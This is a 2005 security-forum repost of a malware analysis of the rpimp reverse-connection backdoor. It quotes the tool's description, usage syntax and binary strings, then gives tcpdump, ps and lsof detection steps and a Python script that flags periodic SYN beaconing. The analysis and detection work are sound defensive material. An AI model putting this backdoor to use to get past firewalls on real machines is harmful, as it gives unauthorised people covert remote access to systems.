EvilOctal Information Security Team Technical Discussion Group's Archiver

EvilOctal 2005-2-26 03:47

[Repost] Rpimp Backdoor Analysis

Article author: Daniel B. Cid

Rpimp is an interesting backdoor. It allows the attacker to bypass
the firewall protection by connecting back out over some permitted port.


Definition by the author (of rpimp):

Reverse Pimpage was designed to allow you to access a box that is behind a
firewall from outside that firewall itself.  The way it accomplishes this is
by having the "client", the box behind the firewall, send in certain intervals
a SYN request to a certain port.  The reason it does it in intervals is so that
some routers don't freak out that they're getting a continuous stream of SYN
requests, and for efficiency.  Once you get home for the day you simply run the
"server" on your home PC and when the time interval is up it will connect.
Once it's connected the "client" telnets to itself and routes data back and
forth between the two.  It's rather efficient and the security is there.
---------- END


Usage:

root@rootkit:/test/exploits/rp# ./rpimp  --help
./rpimp: invalid option -- -
Usage: ./rpimp [-s] [-c] -h host [-v] [-p port] [-t timeout] [-e expectstr]
           [-g gateway] [-P protocol]
           [-E escapechar]
---------- END


Strings (interesting parts):

/lib/ld-linux.so.2
libnsl.so.1
connect
bind
inet_addr
stdin
strstr
signal
read
listen
fork
getopt
memset
cfmakeraw
tcgetattr
gethostbyname
stderr
fwrite
exit
Connection established.
Escape character is '%c%c'
-g        optional gateway
-v        version option.
127.0.0.1
Exiting...
Client suggested, but host not given.
Successfully forked into pid %i
ERROR: unable to fork, continueing...
FATAL: Neither server or client defined, exiting.
Reverse Pimpage v2.1 by: Matt Miller (warped@hick.org)
    Bug fixes and Term Emul. by Tommy (dantar@dantar.com)
Usage: %s [-s] [-c] -h host [-v] [-p port] [-t timeout] [-e expectstr]
        [-g gateway] [-P protocol]
        [-E escapechar]
-s        Server option, -h not needed.
-c        Client option, host needed.
-t        timeout for client to reconnect.
-e        expect string to expect from gateway (will send remotehost)
-P        protocol to use, either telnet or none.
Unable to resolve %s
telnet
127.0.0.1
---------- END


Ways to detect


1- Use tcpdump to check whether any program is trying to connect to a remote
machine on port 1040 (the port can be changed, but this is the default).

tcpdump -i eth0 tcp port 1040

--
13:26:47.490302 192.168.1.107.32781 > 192.168.1.106.1040: S 3771526166:3771526166(0) win 5840 <mss 1460,sackOK,timestamp 647210 0,nop,wscale 0> (DF)
13:26:47.491062 192.168.1.106.1040 > 192.168.1.107.32781: R 0:0(0) ack 3771526167 win 0 (DF)


2- Verify whether any rpimp process is running.

ps -aux | grep rpimp

root    2493  0.0  0.1  1420  308 tty1    S   13:25  0:00 ./rpimp -c -h 192.168.1.106


3- Using lsof, look for entries similar to these:


rpimp    2493 root  mem   REG      3,3  672140   194066 /lib/ld-2.3.1.so
rpimp    2493 root  mem   REG      3,3  87653   194048 /lib/libnsl-2.3.1.so
rpimp    2493 root  mem   REG      3,3 1435624   194045 /lib/libc-2.3.1.so
rpimp    2493 root   0u  CHR      4,1         64399 /dev/tty1
rpimp    2493 root   1u  CHR      4,1         64399 /dev/tty1
rpimp    2493 root   2u  CHR      4,1         64399 /dev/tty1
rpimp    2493 root   3u  sock      0,0         14410 can't identify protocol
rpimp    2493 root   4u  sock      0,0         14604 can't identify protocol
rpimp    2493 root   5u  sock      0,0         14610 can't identify protocol
rpimp    2493 root   6u  sock      0,0         14611 can't identify protocol

---------- END
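Step 1 above depends on reading tcpdump output by eye. The following added example (not from the original article) automates that check: it parses tcpdump lines in the format shown and flags any source that sends SYNs to the same host and port at regular intervals, which is the beaconing behaviour rpimp's client is described as having. The sample lines are constructed, and the 60-second interval and the jitter tolerance are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample in the tcpdump 3.x format shown on this page: one host
# sending a SYN to 192.168.1.106:1040 every 60 s (each answered by a RST),
# plus one unrelated single connection to a web server.
SAMPLE = """\
13:26:47.490302 192.168.1.107.32781 > 192.168.1.106.1040: S 3771526166:3771526166(0) win 5840 <mss 1460,sackOK,timestamp 647210 0,nop,wscale 0> (DF)
13:26:47.491062 192.168.1.106.1040 > 192.168.1.107.32781: R 0:0(0) ack 3771526167 win 0 (DF)
13:27:47.502111 192.168.1.107.32782 > 192.168.1.106.1040: S 3771600001:3771600001(0) win 5840 <mss 1460,sackOK,timestamp 653210 0,nop,wscale 0> (DF)
13:27:47.503000 192.168.1.106.1040 > 192.168.1.107.32782: R 0:0(0) ack 3771600002 win 0 (DF)
13:28:10.000000 192.168.1.107.32790 > 192.168.1.50.80: S 1:1(0) win 5840 <mss 1460,sackOK,nop,wscale 0> (DF)
13:28:47.511222 192.168.1.107.32783 > 192.168.1.106.1040: S 3771700001:3771700001(0) win 5840 <mss 1460,sackOK,timestamp 659210 0,nop,wscale 0> (DF)
13:28:47.512000 192.168.1.106.1040 > 192.168.1.107.32783: R 0:0(0) ack 3771700002 win 0 (DF)
13:29:47.520333 192.168.1.107.32784 > 192.168.1.106.1040: S 3771800001:3771800001(0) win 5840 <mss 1460,sackOK,timestamp 665210 0,nop,wscale 0> (DF)
"""

# Only pure SYN lines ("S" flag right after the port) are of interest; RST/ACK
# replies from the server side are skipped by the regex.
SYN_RE = re.compile(
    r"^(\d\d:\d\d:\d\d\.\d+) (\d+\.\d+\.\d+\.\d+)\.(\d+) > (\d+\.\d+\.\d+\.\d+)\.(\d+): S "
)


def parse_syns(text):
    """Return a list of (seconds_since_midnight, src_ip, dst_ip, dst_port) per SYN line."""
    syns = []
    for line in text.splitlines():
        m = SYN_RE.match(line)
        if not m:
            continue
        ts, src, _sport, dst, dport = m.groups()
        hh, mm, ss = ts.split(":")
        syns.append((int(hh) * 3600 + int(mm) * 60 + float(ss), src, dst, int(dport)))
    return syns


def find_beacons(text, min_syns=3, jitter=2.0):
    """Group SYNs by (src, dst, dport) and report groups whose inter-SYN gaps
    all lie within `jitter` seconds of each other, i.e. periodic reconnects.
    Returns {(src, dst, dport): mean_interval_seconds}."""
    groups = defaultdict(list)
    for seconds, src, dst, dport in parse_syns(text):
        groups[(src, dst, dport)].append(seconds)
    hits = {}
    for key, times in groups.items():
        if len(times) < min_syns:
            continue  # a single or double connection attempt is not a beacon
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        if max(gaps) - min(gaps) <= jitter:
            hits[key] = round(sum(gaps) / len(gaps), 1)
    return hits
```

Run `find_beacons` over a saved `tcpdump -i eth0 'tcp[tcpflags] == tcp-syn'` capture; a hit on an unexpected remote host and port is worth following up with the ps and lsof checks in steps 2 and 3.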

© 1999-2008 EvilOctal Security Team